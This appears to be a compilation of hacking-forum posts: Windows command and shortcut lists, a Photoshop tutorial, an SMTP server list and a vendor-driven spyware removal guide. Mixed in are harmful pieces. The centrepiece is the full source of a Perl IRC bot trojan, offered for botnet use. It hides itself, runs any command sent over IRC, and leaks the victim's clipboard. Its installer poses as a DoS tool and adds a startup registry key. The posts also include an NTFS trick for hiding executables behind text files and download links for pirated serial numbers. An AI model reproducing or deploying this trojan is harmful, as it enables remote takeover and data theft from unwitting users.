Sign by xXx - xXx Rulez

ALL WINDOWS COMMANDS  

Run Commands:
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt

Run Commands to access the control panel:
appwiz.cpl -Add/Remove Programs control
timedate.cpl -Date/Time Properties control
desk.cpl -Display Properties control
findfast.cpl -FindFast control
inetcpl.cpl -Internet Properties control
main.cpl keyboard -Keyboard Properties control
main.cpl -Mouse Properties control
mmsys.cpl -Multimedia Properties control
netcpl.cpl -Network Properties control
password.cpl -Password Properties control
mmsys.cpl sounds -Sound Properties control
sysdm.cpl -System Properties control

Command Prompt:
ANSI.SYS Defines functions that change display graphics,

control cursor movement, and reassign keys.

APPEND Causes MS-DOS to look in other directories
when editing a file or running a command.

ARP Displays, adds, and removes arp information from network devices.

ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view,
modify, and rebuild the boot.ini

BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.

COLOR Easily change the foreground and background color
of the MS-DOS window.

COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

[GFX]Creating Smoke With Photoshop  


1 - Create some Shapes: I created some random shapes.



2 - Apply a Gaussian blur on each shape



3 - Using the liquify filter



4 - Positioning the shapes



5 - Adding some colors

Add a background color on the layer of the shape, otherwise the Hue/Saturation won't work


6 - Creating a cloud behind the smoke

Set a feather with a high value, like 40 to 80, and after that apply the hue/saturation on the cloud too


7 - Adding a gradient to create an atmosphere

The gradient will give a atmosphere and more depth to the image


Final Result


The whole process took me about 30 to 40 minutes tops, it’s pretty simple, although it can be quite hard to create a natural smoke with the liquify filter, the best thing to do is to play with the brushes and with the tools to achieve the desired effect.

AttachmentSize

CODE
http://abduzeedo.com/files/smokeTest.zip
2.81 MB
CODE
http://abduzeedo.com/files/shapes.zip
3.57 MB
CODE
http://abduzeedo.com/files/smokeTest.jpg
163.55 KB

NOTE : ALL CREDITS FOR THE ORIGINAL TUTORIAL MAKER :)

[l33t]Hide files behind files:the secret trick  


In the NTFS file system When you create a new file , one unnamed default stream is created to store all data written to the file.Since NTFS file system in Windows 2000 or above supports Alternate Data Streams,you are allowed to create additional streams for text file. All data stored in the addition streams will be hidden and no one will be able to read the data. This may be useful when you would like to hide some sensitive info from being read by others when sharing the file to public.

What is Alternate Data Stream??

In simple words it is a facility to hide data behind data.

This can be used to hide malicious virus files behind other text or graphic files.

How to hide text file behind a text file??

Here is an example to hide text file behind a text file.

1> Create a text file using Command Prompt.

Go to Run, type cmd. Change the directory if you want.

Type

echo visit etricks.in for cool computer tricks > etricks.txt:hidden

Here hidden is alternate data stream created along with etricks.txt

2>To enter data using that hidden data stream type

notepad etricks.txt:hidden

You will see a popup saying “Cannot find the C:\etricks.txt:Hidden.txt file”. Do you want to create a new file?”.

click yes.

3> Type anything you want and press ctrl+s.

4> Now go to C drive. There won’t be any such file. You will see etricks.txt only.

5> To view data in hidden file go to cmd and type

notepad etricks.txt:hidden

and now you can see the data in etricks.txt:hidden.txt

How to hide .exe file behind txt file??

Procedure is quite similar to the above one.

c:\> type c:\windows\notepad.exe > hello.txt:note.exe

Here notepad.exe is copied to hello.txt:note.exe

Now when you copy hello.txt, note.exe is also copied along with it.

1 Million Software Serial Numbers  

1 Million Software Serial Numbers

[Image: 71fe06627057.jpg]

Download:
RapidShare.com: http://rapidshare.com/files/165758769/1_...umbers.rar

DepositFiles.com: http://depositfiles.com/files/doy16surj


FileFactory.com: http://www.filefactory.com/file/ce35fd/n...umbers_rar


Letitbit.net: http://letitbit.net/download/72347d32000...s.rar.html

Password: T@R@$

Perl / bot trojan, Could be used for building a bot net, needs a couple more features  


This is a perl bot a built then compiled with perlapp to run as a trojan on others computers. It would also be a good candidate for a bot net bot, if someone added syn flood or other various network attacks. If you would like to add supplements to this bot just join the malvager forum and help us out. It can't revive itself out of suspension and needs a password option. Oh yeah and I used this bot tutorial to start with and you will defiantly notice the stolen code.

#!c:/perl/bin/perl.exe -w
#This is published under the gentleman's mal ware license should you
#improve it show the owner and give the owner cred
use Sys::Hostname;
use Net::IRC;
use strict;
use Win32::GUI;
use Win32::Clipboard;
my $hw = Win32::GUI::GetPerlWindow();
Win32::GUI::Hide($hw);
#This is a wait, so that if the user isn't connected to a network
#it will wait 45 seconds giving them plenty of times to get connected
sleep(45);
my $clip = Win32::Clipboard;
my $host = hostname();
my $capsule = int(rand(99));
my $hoster = $host.$capsule;
my $irc = new Net::IRC;


my $conn = $irc->newconn(
Server => shift || 'irc.9unkz0r.com',
Port => shift || '6667',
Nick => $hoster,
Ircname => 'I like to greet!',
Username => 'fucker'
);

# We're going to add this to the conn hash so we know what channel we
# want to operate in.
$conn->{channel} = shift || '#9unkz0r';

sub on_connect {

# shift in our connection object that is passed automatically
my $conn = shift;

# when we connect, join our channel and greet it
$conn->join($conn->{channel});
$conn->privmsg($conn->{channel}, 'Hello everyone!');
$conn->{connected} = 1;

}

sub on_join {

# get our connection object and the event object, which is passed
# with this event automatically
my ($conn, $event) = @_;

# this is the nick that just joined
my $nick = $event->{nick};
# say hello to the nick in public
$conn->privmsg($conn->{channel}, "Fuck You, $nick!");
}

sub on_part {

# pretty much the same as above

my ($conn, $event) = @_;

my $nick = $event->{nick};
$conn->privmsg($conn->{channel}, "Such a dick, $nick!");

}

sub on_msg {
my ($conn, $event) = @_;
my $text = $event->{args}[0];
my $pid;
if($pid = fork){
# Parent
$conn->privmsg($event->{nick}, "$text");
}elsif($pid == 0){
# Child, There is a problem with ram consumption I think using
#exec() rather than system is a good call, has not been tested with exec
system("$text");
}else{
# Error
die "Fork did not work\n";
}
}
sub on_public {

# on an event, we get connection object and event hash
my ($conn, $event) = @_;

# this is what was said in the event
my $text = $event->{args}[0];

# regex the text to see if it begins with !roker
if ($text =~ m/clip/) {

# if so, pass the text and the nick off to the weather method
my $weather_text = $clip->Get();

# wrap text at 400 chars (about as much as you should put
# into a single IRC message
my @texts = $weather_text;
# $event->{to}[0] is the channel where this was said
foreach (@texts) {
$conn->privmsg($event->{to}[0], $_);
}
}
}
$conn->add_handler('public', \&on_public);

$conn->add_handler('msg', \&on_msg);
# add event handlers for join and part events
$conn->add_handler('join', \&on_join);
$conn->add_handler('part', \&on_part);

# The end of MOTD (message of the day), numbered 376 signifies we've connect
$conn->add_handler('376', \&on_connect);

#ccgenerator
$irc->start();


It will run anything from the command line you private message it, And if you type !clip, it will display the persons clipboard.

Here is the install program, it masquerades itself as a ip dos program, but really just puts registry entries in the machine so that it will start on restart.

use Sys::Hostname;
use Tk;
sub on_cc {
my $mw = new MainWindow;
$mw->Label(-text => 'Ip to attack')->pack;
$mw-> Entry() -> pack();
$mw->Label(-text => 'Will not work if IP is invalid')->pack;
$mw->Label(-text => 'Only Click Button Once')->pack;
$mw->Button(-text => 'Nuclear DOS',
-command =>\&on_press)->pack;
MainLoop;
}
on_cc();
sub on_press() {
$host = hostname();
my $regedit = 'REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ccapp2 /t REG_EXPAND_SZ /d c:\windows';
my $bullshit = $regedit.'\\'.$host.'\RunTimeLib.exe';
my $dirs = 'mkdir c:\windows';
my $dirt = $dirs."\\".$host;
my $cp = 'xcopy .\runtime\RunTimeLib.exe "c:\windows"'."\\".$host;
my $exxe = 'c:\windows'."\\".$host."\\".'RunTimeLib.exe';
system("$bullshit");
system("$dirt");
system($cp);
system('cls');
my $pid;
if($pid = fork){
# Parent
system('echo starting syn flood');
}elsif($pid == 0){
# Child
system("$exxe");
}else{
# Error
die "Fork did not work\n";
}
exit;
}

Spytector Removal Guide  

Do you have Spytector?

This “Spytector Removal Guide” article will show you how to identify and remove Spytector. This guide will be updated as more information is available.

Spyware Image


Spytector Detection Test

Run SpyHunter’s Spyware Scanner to check for Spytector infections on your PC.

Spytector Description


Spytector is a nasty keylogger that is capable to record every keystroke you type. Spytector may be capturing your username and passwords, monitoring your online IM and e-mail conversations and tracking which websites you visit. Spytector may put your financial and personal information at a very severe risk. Spytector is suggested to be removed with no delay. Spytector higly affects your privacy and may even capture your banking details and pass codes.

Parasite Type: Keyloggers

Aliases: Spyware.Spytector, Keylog-Spytector, Hacktool.Spytector, Spytector Keylogger

Spytector Method of Automatic Detection

The removal of spyware such as Spytector can be a difficult process. If you regularly run a spyware scan with a good spyware remover, you can automatically detect Spytector and other Spyware, Adware, Worms, Trojans and Browser Hijackers.

To quickly detect Spytector, follow the instructions below:

  1. Download SpyHunter’s Spyware Scanner Download SpyHunter’s Spyware Scanner.

  2. Select “Start Scan” to run a full system Spytector scan.

  3. Reboot your computer.

  4. Run another scan to pick up any remaining Spytector infections.

** SpyHunter’s Spyware Scanner only allows you to detect Spytector and other spyware. In order to remove Spytector, we advise you to buy the full-version of SpyHunter. Weekly Spytector file updates and technical support are available with SpyHunter’s spyware remover.

Spytector Manual Removal

Use Caution! Please read the instructions below carefully. Manual removal of Spytector is a delicate procedure. Proceed at your own risk. We advise you to backup your system before you manually remove Spytector.

If you are still having problems with Spytector after completing these instructions, we recommend youdownload SpyHunter’s Spyware Detection Tool to safely detect Spytector.

To manually remove Spytector, follow these removal steps:

Stop Spytector Processes

  1. To open Task Manager, use CTRL+ALT+DEL or CTRL+SHIFT+ESC.

  2. Go to Image Name to find “Spytector” processes by name.

  3. Find and stop the “Spytector” processes listed below.
    msihdr.exe
    Spytector.exe
    kbdsm.exekbdsm.exe

Unregister Spytector DLL Files

  1. Go to Start > Run > type cmd and then press OK.

  2. To unregister “Spytector” DLL file, type in the exact directory path +
    regsvr32 /u + [DLL_NAME] (ex., :C\ Spytector \> regsvr32 /u Spytector.dll).

  3. Find and unregister “Spytector” DLL files listed below.
    msihdr.dll
    kbdsm.dll

Delete Spytector Registry Values

  1. Go to Start > Run > type regedit and then press OK.

  2. To search for Spytector, press Ctrl + F and type Spytector to
    locate the key that has the value you want to delete.

  3. To delete “Spytector” value, right-click on it and select Delete.

  4. Find and delete “Spytector” registry keys listed below.
    Spytector
    HKEY_LOCAL_MACHINE SOFTWAREActive SetupInstalled Components{45AF4012-AF03-B3AC-EA32-20A312B6012D}45AF4012-AF03-B3AC-EA32-20A312B6012D

Spytector Symptoms

There are many signs that your PC has been hijacked and infected with Spytector or other spyware applications. To reduce the damage that can be done to your PC, start detecting Spytector symptoms on time. Below is a list of possible Spytector symptoms that your PC may have. Notice that certain spyware symptoms vary depending on upon the severity of the infection and other factors.

  • Installs without your knowledge or permission. Usually spyware such as Spytector may be installed from a website through an embedded script or program in a webpage. There are some malwares that install through web pop-ups or free software that require you to accept a downloadable file.

  • Tracks your surfing habits. Spyware applications such as Spytector are designed to track and collect details such as what websites you visit, what your usernames and passwords are and other sensitive information. Malware may even record and collect your login details for your online bank account.

  • Bombards your PC with popup ads. Some unwanted applications such as Spytector display annoying popups (often for adult or other objectionable web sites) while you are surfing the Web and even when your PC has been idle for many minutes.

  • Modifies or hijacks your homepage and displays new desktop shortcuts. Some spyware programs like Spytector add new unnecessary shortcuts on your desktop. Moreover, Spytector may actually change your default homepage to a different homepage. Sometimes Spytector won’t even allow you to change it back to your original homepage.

  • Slows down your PC’s performance. One of the most common spyware symptoms is when your system suddenly starts operating slower than usual. Spyware applications use a lot of your PC’s resources to deliver popup ads and send information to third-parties which can results in a slow computer performance and system crashes.

Spytector Method of Infection

One of the most common reasons for getting infected with Spytector or other types of spyware is because people do not apply safe Internet practices. It is important to learn how one gets infected with Spytector or other types of spyware. Once you know what not to do, you will be able to avoid falling victim to spyware.

Below we provide some possible reasons why you might have become infected with Spytector:

  1. You received an e-mail with an attachment from someone you don’t know and opened it.This is one of the most common ways for Adware, Viruses, or Spyware like Spytector to infect your PC. How do you know that the attachment is dangerous? It usually sends attachments that end with a .exe, .com, .bat, or .pif. Do not open email attactments if you don’t know who the sender is!

  2. You were surfing the Web and you clicked on a popup ad warning you that your PC is infected. You panicked and clicked on the ad’s OK button; thus you were directed to Spytector’s website and it tried to push a product on you. Ignore such messages! We recommend closing these windows by clicking on the X instead of the OK button.

  3. You visited a questionable website. A large amount of spyware is mostly pushed through adult sites. You might have accidentally clicked on a link that automatically installed unwanted software such as Spytector.

  4. You downloaded a freeware or shareware program. Some developers offer their software for free, but can come with other unwanted programs such as Spytector bundled with it. Do not install any free software without reading its EULA. By simply reading a program’s EULA, you can determine whether a program you are installing has spyware bundled with it.

  5. You downloaded a peer-to-peer (P2P) or shared network application. Very often peer-to-peer sharing programs are bundled with spyware similar to Spytector.

  6. You downloaded some program from Warez or Crack websites. The downloads from these websites are often overrun with dangerous infections such as Spytector.

Spytector Quick Prevention Tips

Follow the Spytector prevention tips below to avoid Spytector infections and other malicious software.

  1. Run Windows Updates regularly to ensure you have the most up-to-date and secure system.A good tactic is to set up your system to check for updates on a regular basis.

    To set up your system to access automatic updating services, follow these steps:
    Go to 
    Start > Control Panel > System > Automatic Updates (XP) or Start > Settings > Control Panel > Automatic Updates (2000).

  2. Use a firewall. A firewall is a software or hardware that serves as a blockade to keep data secure and safe and unauthorized users off your computer or network. You can choose from a variety of firewalls that are designed to meet different needs.

  3. Firmly secure Internet Explorer settings. If you’re using Internet Explorer as your browser, change its settings to block spyware applications.

    To change Internet Explorer settings, go to 
    Tools > Internet Options > Security > Custom Level.

    You will see a section near the top of the dialogue box devoted to Active X controls. There you should disable downloading of both signed and unsigned Active X controls and those marked as unsafe. Some Active X objects are spyware, and this action will block them.

  4. Install a good and reputable anti-virus program. Make sure that you install only reputable anti-spyware and anti-virus software like SpyHunter. Most reputable anti-spyware software programs today are also designed to identify known viruses, which could contain Trojan horses as well.

  5. Always keep your anti-spyware or anti-virus up-to-date with the latest malware definitions. The creators of anti-virus applications are constantly finding new security holes in their software and providing software updates. Therefore, it is important to make sure your anti-virus and anti-spyware programs are up-to-date. These updates are typically installed through an integrated update system.

  6. Practice safe Internet surfing habits. Stay away from any questionable sites, including pornography, gambling, hacking or other off-beat sites.

The purpose of this “Spytector Removal Guide” article is to describe the removal process of SpyLocked. The SpyLocked manual removal instructions are to serve as a guide. We do not guarantee that the manual removal instructions will completely remove Spytector. It is advised to use SpyHunter to safely remove SpyLocked. -:))

BEST KEYBOARD SHORTCUTS  

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an it

-----------------------------------------------------------------------------------------------------------------------------

Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
-----------------------------------------------------------------------------------------------------------------------------------
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW


-:))

List of SMTP Servers 2  

ProviderSMTP Server
12012.net.il
191mail.191.biz
191.itmail.191.it
Access4Lesssmtp.access4less.net
Active Networksmtp.activenetwork.it
Actrix Networksmail.actrix.co.nz
Adelphiamail.adelphia.net
akfreesmtp.akfree.it
albacomsmpt.albacom.net
Albacomrelay.albacom.net
Albacomsmtp.albacom.net
alcoteksmtp.alcotek.it
aliceout.aliceposta.it
aliceposta.itmail.tin.it
aliseoutmail.f2s.com
AOLsmtp.aol.com
Arnetsmtp.arnet.com.ar
Arubasmtp.aruba.it
AT & T Wirelesssmtp.attwireless.net
AT & T Worldnetimailhost.worldnet.att.net
atlanetsmtp.atlavia.it
atlanetsmtp.weblinea.it
Aunasmtp.auna.com
Bahrain Telecommunications Companybatelco.com.bh
Barak I.T.Cmail.barak.net.il
basilicatanet.itmail.basilicatanet.it
bella.cibella.ci
Bellsouthmail.bellsouth.net
Bezeq Internationalmail.bezeqint.net
Bezeqintmail.bezeqint.net
Bitstoppangasinan.com
Blu.itsmtp.blu.it
Bluebottlemail.bluebottle.com
bluelight.comsmtp.mybluelight.com
Bluewinmail.bluewin.ch
BlueYondersmtp.blueyonder.co.uk
bol.com.brsmtp.bol.com.br
BRTURBOsmtp.brturbo.com.br
BT Internetmail.btinternet.com
BT Openworldmail.btopenworld.com
BTClicksmtp.btclick.com
BTTBmail.bttb.net.bd
BusinessServesmtp.businessserve.co.uk
Cable Onemail.cableone.net
Cableinetsmtp.blueyonder.co.uk
Caiwaysmtp.caiway.nl
Callsouth - Broadbandsmtp2.callsouth.net.nz
Callsouth - Dial upsmtp.callsouth.net.nz
Cantv.netmail.cantv.net
cegetelsmtp.cegetel.net
Chariot Netconnectmail.vic.chariot.net.au
charterpop.charter.net
Chartermail.charter.net
cheapnetsmtp.cheapnet.it
chello.plmail.chello.pl
ciaowebciaosmtp.ciaoweb.it
Cingularsmtp.mymmode.com
Ciudadsmtp.ciudad.com.ar
Claranetrelay.clara.net
Clear Netsmtp.clear.net.nz
click21smtp.click21.com.br
Club-Internetsmtp.club-internet.fr
collegeclubcollegeclub.com
Colt.net (Germany)smtp.ipmail.colt.net
Columbia Power and Watermail.cpws.net
Comcastsmtp.comcast.net
Cox - Centralsmtp.central.cox.net
Cox - Eastsmtp.east.cox.net
Cox - Westsmtp.west.cox.net
Culturasmtp.cultura.com.br
CWComsmtp.ntlworld.com
Datamatmail.datamat.it
Demonpost.demon.co.uk
Digitel Italiasmtp.etmail.it
Dinajpurwww.dinajpur.biz
Dream Net Internetmail.dreamnet.co.nz
Earth Linksmtpauth.earthlink.net
Easynetsmtp.easynet.co.uk
eircom.netmail2.eircom.net
Elitelsmtp.elitel.biz
Email.itsmtp.email.it
Euronet NLsmtp.euronet.nl
everybodycanadditsverybad
Excitesmtp.tiscali.it
EzySurfsmtp.ezysurf.co.nz
FastMailmail.messagingengine.com
fastwebpop.fastwebnet.it
Fastwebmailbus.fastweb.it
Fastwebsmtp.fastweb.it
Fastwebsmtp.fastwebnet.it
fibertel.com.arsmtp.fibertel.com.ar
Freesmtp.free.fr
Free Telecomsmtp.free.fr
Freedom2surfoutmail.f2s.com
Freemailsmtp.freemail.it
freemail.itmail.freemail.it
freemail.it (supereva)mail.freemail.it
freenetmx.freenet.de
freenet.demx.freenet.de
Freeservesmtp.freeserve.co.uk
Galactica.itsmtp.galactica.it
Geniemail.genie.co.uk
GIGAsmtp.giga.net.tw
Globe Net Communicationssmtp.globe.net.nz
gmailsmtp.gmail.com
GMXmail.gmx.net
Go Daddysmtpout.secureserver.net
go.comsmtp.go.com
Haier Electronicssmtp.haier-electronics.com
Hinetmsa.hinet.net
HiNetms1.hinet.net
hotmail (Please see Windows Live Homtail)mx2.hotmail.com
HOTMAIL (Please see Windows Live Homtail)hotmail.co.uk
Hotmail.com (Please see Windows Live Homtail)mx2.hotmail.com
Hotmail.com (Please see Windows LiveHomtail)mx1.hotmail.com
Hotmail.com (Please see Windows LiveHomtail)mx1.hotmail.com
HotPOP.comsmtp.hotpop.com
I4U Internet Servicesmail.i4u.net.nz
ic24smtp.ic24.net
IGsmtp.ig.com.br
IHUGsmtp.ihug.co.nz
INETinet.it
Infinitomail.infinito.it
InfoStructure -- GRR Technologysmtp.grrtech.com
InfoStructure -- InfoStructuresmtp.mind.net
InfoStructure -- Klamath Falls Internetsmtp.kfalls.net
InfoStructure -- Medford Internetsmtp.medford.net
InsightBBmail.insightbb.com
Interbusiness (TI Easynet)mail1.cs.interbusiness.it
INTERFREEmail.interfree.it
Internet Zahavsout.zahav.net.il
internetliberosmtp.internetlibero.it
inWindmail.inwind.it
IOLmail.iol.it
Iomartsmtp.domain.ext
IPrimus Australiasmtp.iprimus.com.au
Iprolinksmtp.iprolink.co.nz
istruzione.itistruzione.it
ItalyMAILmail.italymail.biz
ixpres.comsmtp.ixpres.com
jumpymail.jumpy.it
Junosmtp.juno.com
Katamailsmtp.katamail.com
Katawebsmtp.katamail.com
la postesmtp.laposte.net
Le neufsmtp.neuf.fr
Liberomail.libero.it
Lillinetsmtp.weblinea.it
Lineonesmtp.lineone.net
Lycossmtp.lycos.co.uk
lycos.itsmtp.lycos.it
Mac.comsmtp.mac.com
Madasafishsmtp.madasafish.com
